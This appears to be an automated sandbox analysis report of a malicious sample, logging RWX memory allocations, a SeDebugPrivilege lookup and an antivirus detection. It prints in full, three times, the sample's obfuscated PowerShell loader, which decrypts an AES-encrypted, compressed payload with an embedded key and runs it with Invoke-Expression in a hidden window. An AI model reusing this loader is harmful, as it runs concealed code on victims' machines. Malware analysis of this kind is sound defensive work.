NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02394000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0240b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02407000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0238b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02405000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02395000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02396000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0240c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023b8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023b9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x048d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x048d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x048d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x048d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x048d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x048d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x048d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x048d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x048d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x048d9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x048da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x048db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x048dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x048dd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x048de000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x048df000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e61000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e63000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 24, 2022, 7:32 a.m.	process_identifier: 2420 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e64000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell.exe -ExecutionPolicy UnRestricted $UGJgEhmuQd = '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';$WKVNMcNuTUpXE = 'bUlYbmdVTkJkVnNvWVJVeXFwcHBVeHJuanZpeVFGYlY=';$oFbHgtfJ = New-Object 'System.Security.Cryptography.AesManaged';$oFbHgtfJ.Mode = [System.Security.Cryptography.CipherMode]::ECB;$oFbHgtfJ.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$oFbHgtfJ.BlockSize = 128;$oFbHgtfJ.KeySize = 256;$oFbHgtfJ.Key = [System.Convert]::FromBase64String($WKVNMcNuTUpXE);$gCoYl = [System.Convert]::FromBase64String($UGJgEhmuQd);$ICVweoIsktHXuPbT = $gCoYl[0..15];$oFbHgtfJ.IV = $ICVweoIsktHXuPbT;$ISrVZKmzx = $oFbHgtfJ.CreateDecryptor();$BVbcZFBkTOHzRio = $ISrVZKmzx.TransformFinalBlock($gCoYl, 16, $gCoYl.Length - 16);$oFbHgtfJ.Dispose();$yPWz = New-Object System.IO.MemoryStream( , $BVbcZFBkTOHzRio );$cSgQKoGnaBTUr = New-Object System.IO.MemoryStream;$FBjahzKZdIyOBKk = New-Object System.IO.Compression.GzipStream $yPWz, ([IO.Compression.CompressionMode]::Decompress);$FBjahzKZdIyOBKk.CopyTo( $cSgQKoGnaBTUr );$FBjahzKZdIyOBKk.Close();$yPWz.Close();[byte[]] $kDPXaLSxrvyUbr = $cSgQKoGnaBTUr.ToArray();$zZiPscSF = [System.Text.Encoding]::UTF8.GetString($kDPXaLSxrvyUbr);Invoke-Expression($zZiPscSF)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $UGJgEhmuQd = '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';$WKVNMcNuTUpXE = 'bUlYbmdVTkJkVnNvWVJVeXFwcHBVeHJuanZpeVFGYlY=';$oFbHgtfJ = New-Object 'System.Security.Cryptography.AesManaged';$oFbHgtfJ.Mode = [System.Security.Cryptography.CipherMode]::ECB;$oFbHgtfJ.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$oFbHgtfJ.BlockSize = 128;$oFbHgtfJ.KeySize = 256;$oFbHgtfJ.Key = [System.Convert]::FromBase64String($WKVNMcNuTUpXE);$gCoYl = [System.Convert]::FromBase64String($UGJgEhmuQd);$ICVweoIsktHXuPbT = $gCoYl[0..15];$oFbHgtfJ.IV = $ICVweoIsktHXuPbT;$ISrVZKmzx = $oFbHgtfJ.CreateDecryptor();$BVbcZFBkTOHzRio = $ISrVZKmzx.TransformFinalBlock($gCoYl, 16, $gCoYl.Length - 16);$oFbHgtfJ.Dispose();$yPWz = New-Object System.IO.MemoryStream( , $BVbcZFBkTOHzRio );$cSgQKoGnaBTUr = New-Object System.IO.MemoryStream;$FBjahzKZdIyOBKk = New-Object System.IO.Compression.GzipStream $yPWz, ([IO.Compression.CompressionMode]::Decompress);$FBjahzKZdIyOBKk.CopyTo( $cSgQKoGnaBTUr );$FBjahzKZdIyOBKk.Close();$yPWz.Close();[byte[]] $kDPXaLSxrvyUbr = $cSgQKoGnaBTUr.ToArray();$zZiPscSF = [System.Text.Encoding]::UTF8.GetString($kDPXaLSxrvyUbr);Invoke-Expression($zZiPscSF)

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 24, 2022, 7:32 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted $UGJgEhmuQd = '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';$WKVNMcNuTUpXE = 'bUlYbmdVTkJkVnNvWVJVeXFwcHBVeHJuanZpeVFGYlY=';$oFbHgtfJ = New-Object 'System.Security.Cryptography.AesManaged';$oFbHgtfJ.Mode = [System.Security.Cryptography.CipherMode]::ECB;$oFbHgtfJ.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$oFbHgtfJ.BlockSize = 128;$oFbHgtfJ.KeySize = 256;$oFbHgtfJ.Key = [System.Convert]::FromBase64String($WKVNMcNuTUpXE);$gCoYl = [System.Convert]::FromBase64String($UGJgEhmuQd);$ICVweoIsktHXuPbT = $gCoYl[0..15];$oFbHgtfJ.IV = $ICVweoIsktHXuPbT;$ISrVZKmzx = $oFbHgtfJ.CreateDecryptor();$BVbcZFBkTOHzRio = $ISrVZKmzx.TransformFinalBlock($gCoYl, 16, $gCoYl.Length - 16);$oFbHgtfJ.Dispose();$yPWz = New-Object System.IO.MemoryStream( , $BVbcZFBkTOHzRio );$cSgQKoGnaBTUr = New-Object System.IO.MemoryStream;$FBjahzKZdIyOBKk = New-Object System.IO.Compression.GzipStream $yPWz, ([IO.Compression.CompressionMode]::Decompress);$FBjahzKZdIyOBKk.CopyTo( $cSgQKoGnaBTUr );$FBjahzKZdIyOBKk.Close();$yPWz.Close();[byte[]] $kDPXaLSxrvyUbr = $cSgQKoGnaBTUr.ToArray();$zZiPscSF = [System.Text.Encoding]::UTF8.GetString($kDPXaLSxrvyUbr);Invoke-Expression($zZiPscSF) filepath: powershell.exe	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 24, 2022, 7:32 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

File has been identified by 10 AntiVirus engines on VirusTotal as malicious (10 events)

MicroWorld-eScan	VBS.Heur.ObfDldr.26.0F6D7C56.Gen
